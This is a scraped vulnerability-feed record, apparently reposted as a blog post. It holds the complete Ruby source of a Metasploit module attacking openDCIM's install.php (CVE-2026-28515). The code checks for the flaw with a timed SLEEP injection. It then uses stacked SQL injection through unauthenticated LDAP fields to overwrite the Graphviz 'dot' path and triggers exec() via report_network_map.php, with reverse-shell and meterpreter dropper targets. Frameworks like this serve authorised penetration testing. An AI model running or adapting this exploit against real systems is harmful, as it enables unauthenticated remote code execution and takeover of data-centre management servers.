{“lastseen”:”2026-04-15T19:28:05″,”description”:”This module exploits a SQL injection vulnerability in openDCIM’s install.php endpoint CVE-2026-28515 to achieve remote code execution. The install.php script remains accessible after installation and processes LDAP configuration parameters via…”,”published”:”2026-04-15T19:02:17″,”modified”:”2026-04-15T19:02:17″,”type”:”metasploit”,”title”:”openDCIM install.php SQL Injection to RCE”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-OPENDCIM_INSTALL_SQLI_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-28515″,”CVE-2026-28516″,”CVE-2026-28517″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::CmdStager\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘openDCIM install.php SQL Injection to RCE’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a SQL injection vulnerability in openDCIM’s install.php\\n endpoint (CVE-2026-28515) to achieve remote code execution. The install.php\\n script remains accessible after installation and processes LDAP configuration\\n parameters via UpdateParameter() without authentication or input sanitization,\\n allowing stacked SQL queries.\\n\\n The exploit chain works by injecting SQL through the LDAP configuration form\\n to overwrite the Graphviz dot binary path in fac_Config, then triggering\\n report_network_map.php which calls exec() with the poisoned value. A backup\\n of the original configuration is created before exploitation and restored\\n after payload delivery.\\n\\n Tested against openDCIM 23.04 through 25.01 on Ubuntu with Apache.\\n },\\n ‘Author’ =\\u003e [\\n ‘Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e’ # Discovery and Metasploit module\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-28515’],\\n [‘CVE’, ‘2026-28516’],\\n [‘CVE’, ‘2026-28517’],\\n [‘URL’, ‘https:\/\/www.vulncheck.com\/advisories\/opendcim-missing-authorization-in-install-php’],\\n [‘URL’, ‘https:\/\/www.vulncheck.com\/advisories\/opendcim-sql-injection-in-config-updateparameter’],\\n [‘URL’, ‘https:\/\/www.vulncheck.com\/advisories\/opendcim-os-command-injection-via-dot-configuration-parameter’],\\n [‘URL’, ‘https:\/\/github.com\/Chocapikk\/opendcim-exploit’]\\n ],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix\/Linux Command Shell’, {\\n ‘Platform’ =\\u003e %w[unix linux],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :cmd\\n # tested with cmd\/unix\/reverse_bash\\n }\\n ],\\n [\\n ‘Linux Dropper’, {\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64],\\n ‘CmdStagerFlavor’ =\\u003e [‘printf’, ‘bourne’],\\n ‘Type’ =\\u003e :dropper\\n # tested with linux\/x64\/meterpreter\/reverse_tcp\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Privileged’ =\\u003e false,\\n ‘DisclosureDate’ =\\u003e ‘2026-02-28’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Base path to openDCIM’, ‘\/’])\\n ])\\n end\\n\\n LDAP_FIELDS = %w[\\n LDAPServer LDAPBaseDN LDAPBindDN LDAPSessionExpiration\\n LDAPSiteAccess LDAPReadAccess LDAPWriteAccess LDAPDeleteAccess\\n LDAPAdminOwnDevices LDAPRackRequest LDAPRackAdmin\\n LDAPContactAdmin LDAPSiteAdmin\\n ].freeze\\n\\n DOT_PARAM = ‘dot’.freeze\\n SQLI_WRAP = [‘\\” WHERE 1=0; ‘, ‘ — ‘].freeze\\n\\n def check\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e install_uri\\n })\\n\\n return CheckCode::Unknown(‘Could not connect to the target.’) unless res\\n return CheckCode::Safe(‘install.php returned unexpected status code.’) unless [200, 302].include?(res.code)\\n\\n body = res.body.to_s\\n return CheckCode::Safe(‘install.php does not appear to be openDCIM.’) if res.code == 200 \\u0026\\u0026 !body.include?(‘ldapaction’) \\u0026\\u0026 !body.include?(‘openDCIM’) \\u0026\\u0026 !body.include?(‘Upgrade’)\\n\\n print_status(‘install.php is accessible, testing time-based SQL injection’)\\n 3.times do |i|\\n sleep_time = rand(1..3)\\n print_status(\\”Test #{i + 1}\/3: SLEEP(#{sleep_time})\\”)\\n _, elapsed_time = Rex::Stopwatch.elapsed_time do\\n send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e install_uri,\\n ‘vars_post’ =\\u003e { ‘ldapaction’ =\\u003e ‘Set’, LDAP_FIELDS.sample =\\u003e \\”#{SQLI_WRAP[0]}SELECT SLEEP(#{sleep_time});#{SQLI_WRAP[1]}\\” }\\n })\\n end\\n print_status(\\”Elapsed time: #{elapsed_time.round(1)} seconds.\\”)\\n return CheckCode::Safe(\\”SQL injection test #{i + 1} did not trigger a delay.\\”) unless elapsed_time \\u003e= sleep_time\\n end\\n\\n CheckCode::Vulnerable(‘Successfully tested SQL injection (3\/3 delay checks passed).’)\\n end\\n\\n def exploit\\n @backup_table = Rex::Text.rand_text_alpha(8).downcase\\n\\n print_status(‘Performing LORI attack (LDAP Override Remote Injection)’)\\n fail_with(Failure::UnexpectedReply, ‘Backup failed.’) unless backup_config\\n\\n case target[‘Type’]\\n when :cmd\\n fail_with(Failure::UnexpectedReply, ‘SQL injection failed.’) unless poison_dot(\\”#{payload.encoded} #\\”)\\n trigger_exec\\n when :dropper\\n execute_cmdstager\\n end\\n ensure\\n cleanup_config\\n end\\n\\n def execute_command(cmd, _opts = {})\\n fail_with(Failure::UnexpectedReply, ‘SQL injection failed.’) unless poison_dot(\\”#{cmd} #\\”)\\n trigger_exec\\n end\\n\\n def trigger_exec\\n print_status(‘Triggering exec() via report_network_map.php’)\\n trigger_dot\\n end\\n\\n def cleanup_config\\n return unless @backup_table\\n\\n print_status(‘Restoring original configuration’)\\n restored = restore_config\\n print_good(‘Configuration restored successfully.’) if restored\\n print_warning(‘Failed to restore configuration. Manual cleanup may be needed.’) unless restored\\n end\\n\\n def install_uri\\n normalize_uri(target_uri.path, ‘install.php’)\\n end\\n\\n def inject_sql(field, sql)\\n form = { ‘ldapaction’ =\\u003e ‘Set’ }\\n LDAP_FIELDS.each { |f| form[f] = ” }\\n form[field] = \\”#{SQLI_WRAP[0]}#{sql}#{SQLI_WRAP[1]}\\”\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e install_uri,\\n ‘vars_post’ =\\u003e form\\n })\\n\\n res \\u0026\\u0026 [200, 302].include?(res.code)\\n end\\n\\n def backup_config\\n inject_sql(‘LDAPServer’,\\n \\”DROP TABLE IF EXISTS #{@backup_table};\\” \\\\\\n \\” CREATE TABLE #{@backup_table} AS SELECT Parameter, Value FROM fac_Config\\” \\\\\\n \\” WHERE Parameter LIKE \\\\\\”LDAP%%\\\\\\” OR Parameter = \\\\\\”#{DOT_PARAM}\\\\\\”;\\”)\\n end\\n\\n def poison_dot(dot_value)\\n escaped = dot_value.gsub(‘\\\\\\\\’) { ‘\\\\\\\\\\\\\\\\’ }\\n inject_sql(‘LDAPBaseDN’,\\n \\”UPDATE fac_Config SET Value = \\\\\\”#{escaped}\\\\\\” WHERE Parameter = \\\\\\”#{DOT_PARAM}\\\\\\”;\\”)\\n end\\n\\n def restore_config\\n inject_sql(‘LDAPSiteAdmin’,\\n \\”UPDATE fac_Config c INNER JOIN #{@backup_table} b ON c.Parameter = b.Parameter SET c.Value = b.Value;\\” \\\\\\n \\” DROP TABLE IF EXISTS #{@backup_table};\\”)\\n end\\n\\n def trigger_dot\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘report_network_map.php’),\\n ‘vars_get’ =\\u003e { ‘format’ =\\u003e ‘0’, ‘containerid’ =\\u003e ‘1’ }\\n })\\n\\n res\\u0026.body\\u0026.strip\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/opendcim_install_sqli_rce.rb”,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/opendcim_install_sqli_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-15T19:28:05″,”description”:”This module exploits a SQL injection vulnerability in openDCIM’s install.php endpoint CVE-2026-28515 to achieve remote code execution. The install.php script remains accessible after installation and…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-47294","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n